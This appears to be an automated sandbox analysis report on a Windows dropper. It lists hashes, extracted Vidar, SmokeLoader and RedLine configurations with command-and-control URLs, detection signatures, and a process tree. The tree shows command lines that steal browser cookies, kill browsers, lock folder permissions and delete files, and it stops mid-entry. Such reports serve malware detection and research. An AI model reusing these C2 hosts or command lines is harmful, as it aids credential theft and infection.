Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    44s
  • max time network
    1812s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    27-07-2021 08:13

General

  • Target

    8 (18).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

AniNEW

C2

akedauiver.xyz:80

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE GCleaner Downloader Activity M3
  • suricata: ET MALWARE GCleaner Related Downloader User-Agent
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 14 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 29 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 6 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 12 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:876
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {D6AA92BF-F2D9-41BA-AAA3-5C7877C99FE8} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
          3⤵
            PID:2904
            • C:\Users\Admin\AppData\Roaming\wstdbvf
              C:\Users\Admin\AppData\Roaming\wstdbvf
              4⤵
                PID:2240
                • C:\Users\Admin\AppData\Roaming\wstdbvf
                  C:\Users\Admin\AppData\Roaming\wstdbvf
                  5⤵
                    PID:2800
                • C:\Users\Admin\AppData\Roaming\autdbvf
                  C:\Users\Admin\AppData\Roaming\autdbvf
                  4⤵
                    PID:1340
                  • C:\Users\Admin\AppData\Local\26b570da-2a41-46d5-947c-02a4c47c0307\5496.exe
                    C:\Users\Admin\AppData\Local\26b570da-2a41-46d5-947c-02a4c47c0307\5496.exe --Task
                    4⤵
                      PID:2156
                      • C:\Users\Admin\AppData\Local\26b570da-2a41-46d5-947c-02a4c47c0307\5496.exe
                        C:\Users\Admin\AppData\Local\26b570da-2a41-46d5-947c-02a4c47c0307\5496.exe --Task
                        5⤵
                          PID:996
                      • C:\Users\Admin\AppData\Roaming\wstdbvf
                        C:\Users\Admin\AppData\Roaming\wstdbvf
                        4⤵
                          PID:1728
                          • C:\Users\Admin\AppData\Roaming\wstdbvf
                            C:\Users\Admin\AppData\Roaming\wstdbvf
                            5⤵
                              PID:2868
                          • C:\Users\Admin\AppData\Roaming\fatdbvf
                            C:\Users\Admin\AppData\Roaming\fatdbvf
                            4⤵
                              PID:576
                            • C:\Users\Admin\AppData\Roaming\autdbvf
                              C:\Users\Admin\AppData\Roaming\autdbvf
                              4⤵
                                PID:1404
                              • C:\Users\Admin\AppData\Local\26b570da-2a41-46d5-947c-02a4c47c0307\5496.exe
                                C:\Users\Admin\AppData\Local\26b570da-2a41-46d5-947c-02a4c47c0307\5496.exe --Task
                                4⤵
                                  PID:2916
                                  • C:\Users\Admin\AppData\Local\26b570da-2a41-46d5-947c-02a4c47c0307\5496.exe
                                    C:\Users\Admin\AppData\Local\26b570da-2a41-46d5-947c-02a4c47c0307\5496.exe --Task
                                    5⤵
                                      PID:3068
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                2⤵
                                • Checks processor information in registry
                                • Modifies data under HKEY_USERS
                                • Modifies registry class
                                PID:948
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                2⤵
                                  PID:2932
                                • C:\Windows\SysWOW64\gkooqlvy\upeotyqo.exe
                                  C:\Windows\SysWOW64\gkooqlvy\upeotyqo.exe /d"C:\Users\Admin\AppData\Local\Temp\C5A4.exe"
                                  2⤵
                                    PID:2608
                                • C:\Users\Admin\AppData\Local\Temp\8 (18).exe
                                  "C:\Users\Admin\AppData\Local\Temp\8 (18).exe"
                                  1⤵
                                  • Loads dropped DLL
                                  • Suspicious use of WriteProcessMemory
                                  PID:1020
                                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of WriteProcessMemory
                                    PID:1704
                                    • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\setup_install.exe
                                      "C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\setup_install.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of WriteProcessMemory
                                      PID:612
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_1.exe
                                        4⤵
                                        • Loads dropped DLL
                                        • Suspicious use of WriteProcessMemory
                                        PID:972
                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_1.exe
                                          sonia_1.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:1032
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_2.exe
                                        4⤵
                                        • Loads dropped DLL
                                        • Suspicious use of WriteProcessMemory
                                        PID:336
                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_2.exe
                                          sonia_2.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious behavior: MapViewOfSection
                                          PID:1800
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_3.exe
                                        4⤵
                                        • Loads dropped DLL
                                        • Suspicious use of WriteProcessMemory
                                        PID:2024
                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_3.exe
                                          sonia_3.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:928
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 928 -s 948
                                            6⤵
                                            • Program crash
                                            PID:2984
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_4.exe
                                        4⤵
                                        • Loads dropped DLL
                                        PID:376
                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_4.exe
                                          sonia_4.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1584
                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                            "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:900
                                            • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                              "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:2076
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:2544
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                  PID:2236
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  8⤵
                                                    PID:2208
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    8⤵
                                                      PID:3056
                                                  • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:2100
                                                    • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                      C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:2460
                                                    • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                      C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                      8⤵
                                                        PID:2616
                                                      • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                        C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                        8⤵
                                                          PID:2808
                                                      • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:2140
                                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:2184
                                                      • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:2208
                                                        • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:2296
                                                      • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:2248
                                                        • C:\Windows\system32\WerFault.exe
                                                          C:\Windows\system32\WerFault.exe -u -p 2248 -s 672
                                                          8⤵
                                                          • Program crash
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:2468
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                  4⤵
                                                    PID:1716
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                    4⤵
                                                    • Loads dropped DLL
                                                    PID:1548
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                    4⤵
                                                    • Loads dropped DLL
                                                    PID:1332
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 612 -s 412
                                                    4⤵
                                                    • Loads dropped DLL
                                                    • Program crash
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1480
                                            • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_5.exe
                                              sonia_5.exe
                                              1⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Modifies system certificate store
                                              PID:1020
                                              • C:\Users\Admin\Documents\AsXLFMrUm73pXEKpYhyOsAMN.exe
                                                "C:\Users\Admin\Documents\AsXLFMrUm73pXEKpYhyOsAMN.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:2584
                                                • C:\Users\Admin\AppData\Roaming\updata.exe
                                                  C:\Users\Admin\AppData\Roaming\updata.exe updata
                                                  3⤵
                                                    PID:2520
                                                • C:\Users\Admin\Documents\h27CGQGr04J3VPJwetDm0v4I.exe
                                                  "C:\Users\Admin\Documents\h27CGQGr04J3VPJwetDm0v4I.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:2572
                                                • C:\Users\Admin\Documents\tqkWXxk2NvhZpuGmAT6A8pRU.exe
                                                  "C:\Users\Admin\Documents\tqkWXxk2NvhZpuGmAT6A8pRU.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:2604
                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    3⤵
                                                      PID:2348
                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      3⤵
                                                        PID:2832
                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        3⤵
                                                          PID:964
                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          3⤵
                                                            PID:2896
                                                        • C:\Users\Admin\Documents\Zpj72qQyKi9xTPA94VHCSEVE.exe
                                                          "C:\Users\Admin\Documents\Zpj72qQyKi9xTPA94VHCSEVE.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          PID:2720
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                            3⤵
                                                              PID:2328
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im chrome.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:828
                                                          • C:\Users\Admin\Documents\XWVyyK7MebkSM8rVjws1LTnA.exe
                                                            "C:\Users\Admin\Documents\XWVyyK7MebkSM8rVjws1LTnA.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:2684
                                                          • C:\Users\Admin\Documents\jLu3aw2DWDUHOO_H1WlwGC3z.exe
                                                            "C:\Users\Admin\Documents\jLu3aw2DWDUHOO_H1WlwGC3z.exe"
                                                            2⤵
                                                              PID:2668
                                                            • C:\Users\Admin\Documents\ei3zXbQUfjHZ85pXddwzQEzS.exe
                                                              "C:\Users\Admin\Documents\ei3zXbQUfjHZ85pXddwzQEzS.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:2656
                                                            • C:\Users\Admin\Documents\rxExJf6OgRASUhj6fIlKWlJO.exe
                                                              "C:\Users\Admin\Documents\rxExJf6OgRASUhj6fIlKWlJO.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:2644
                                                            • C:\Users\Admin\Documents\tVaj9gARNzwLSrtE1aqzmzBT.exe
                                                              "C:\Users\Admin\Documents\tVaj9gARNzwLSrtE1aqzmzBT.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:2632
                                                            • C:\Users\Admin\Documents\AIN_mA1BNE2jF7K0XPakAUSB.exe
                                                              "C:\Users\Admin\Documents\AIN_mA1BNE2jF7K0XPakAUSB.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:2624
                                                              • C:\Users\Admin\Documents\AIN_mA1BNE2jF7K0XPakAUSB.exe
                                                                "C:\Users\Admin\Documents\AIN_mA1BNE2jF7K0XPakAUSB.exe"
                                                                3⤵
                                                                  PID:2320
                                                              • C:\Users\Admin\Documents\lhLHsazYL2j30EhMj_GdaQyv.exe
                                                                "C:\Users\Admin\Documents\lhLHsazYL2j30EhMj_GdaQyv.exe"
                                                                2⤵
                                                                  PID:2532
                                                                  • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                    3⤵
                                                                      PID:1160
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        4⤵
                                                                          PID:1048
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          4⤵
                                                                            PID:1676
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            4⤵
                                                                              PID:1856
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              4⤵
                                                                                PID:1636
                                                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                              "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                              3⤵
                                                                                PID:2404
                                                                              • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                3⤵
                                                                                  PID:2516
                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    4⤵
                                                                                      PID:2316
                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      4⤵
                                                                                        PID:2524
                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        4⤵
                                                                                          PID:1424
                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          4⤵
                                                                                            PID:1340
                                                                                      • C:\Users\Admin\Documents\V2B21EDsxFYZhSdW8XaVsil3.exe
                                                                                        "C:\Users\Admin\Documents\V2B21EDsxFYZhSdW8XaVsil3.exe"
                                                                                        2⤵
                                                                                          PID:2536
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{FPVf-gpHkc-RVfs-3dKNK}\18605689600.exe"
                                                                                            3⤵
                                                                                              PID:2068
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{FPVf-gpHkc-RVfs-3dKNK}\97749672270.exe" /mix
                                                                                              3⤵
                                                                                                PID:1308
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{FPVf-gpHkc-RVfs-3dKNK}\49370479506.exe" /mix
                                                                                                3⤵
                                                                                                  PID:2448
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "V2B21EDsxFYZhSdW8XaVsil3.exe" /f & erase "C:\Users\Admin\Documents\V2B21EDsxFYZhSdW8XaVsil3.exe" & exit
                                                                                                  3⤵
                                                                                                    PID:2540
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /im "V2B21EDsxFYZhSdW8XaVsil3.exe" /f
                                                                                                      4⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:2524
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_1.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_1.exe" -a
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                PID:1124
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_6.exe
                                                                                                sonia_6.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Adds Run key to start application
                                                                                                PID:1100
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  PID:436
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  2⤵
                                                                                                    PID:1972
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    2⤵
                                                                                                      PID:296
                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                    1⤵
                                                                                                    • Process spawned unexpected child process
                                                                                                    PID:436
                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                      2⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:904
                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                    1⤵
                                                                                                    • Process spawned unexpected child process
                                                                                                    PID:2396
                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                      2⤵
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:2408
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5496.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\5496.exe
                                                                                                    1⤵
                                                                                                      PID:764
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5496.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\5496.exe
                                                                                                        2⤵
                                                                                                          PID:1468
                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                            icacls "C:\Users\Admin\AppData\Local\26b570da-2a41-46d5-947c-02a4c47c0307" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                            3⤵
                                                                                                            • Modifies file permissions
                                                                                                            PID:1708
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5496.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\5496.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                            3⤵
                                                                                                              PID:2496
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5496.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\5496.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                4⤵
                                                                                                                  PID:2088
                                                                                                                  • C:\Users\Admin\AppData\Local\510d461d-bf69-4f66-995e-161cd2bfdc31\build2.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\510d461d-bf69-4f66-995e-161cd2bfdc31\build2.exe"
                                                                                                                    5⤵
                                                                                                                      PID:1252
                                                                                                                      • C:\Users\Admin\AppData\Local\510d461d-bf69-4f66-995e-161cd2bfdc31\build2.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\510d461d-bf69-4f66-995e-161cd2bfdc31\build2.exe"
                                                                                                                        6⤵
                                                                                                                          PID:1812
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 776
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:2432
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\58EA.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\58EA.exe
                                                                                                                1⤵
                                                                                                                  PID:2396
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\6682.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\6682.exe
                                                                                                                  1⤵
                                                                                                                    PID:2224
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\BCDD.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\BCDD.exe
                                                                                                                    1⤵
                                                                                                                      PID:2268
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\C5A4.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\C5A4.exe
                                                                                                                      1⤵
                                                                                                                        PID:2816
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\gkooqlvy\
                                                                                                                          2⤵
                                                                                                                            PID:2592
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\upeotyqo.exe" C:\Windows\SysWOW64\gkooqlvy\
                                                                                                                            2⤵
                                                                                                                              PID:3028
                                                                                                                            • C:\Windows\SysWOW64\sc.exe
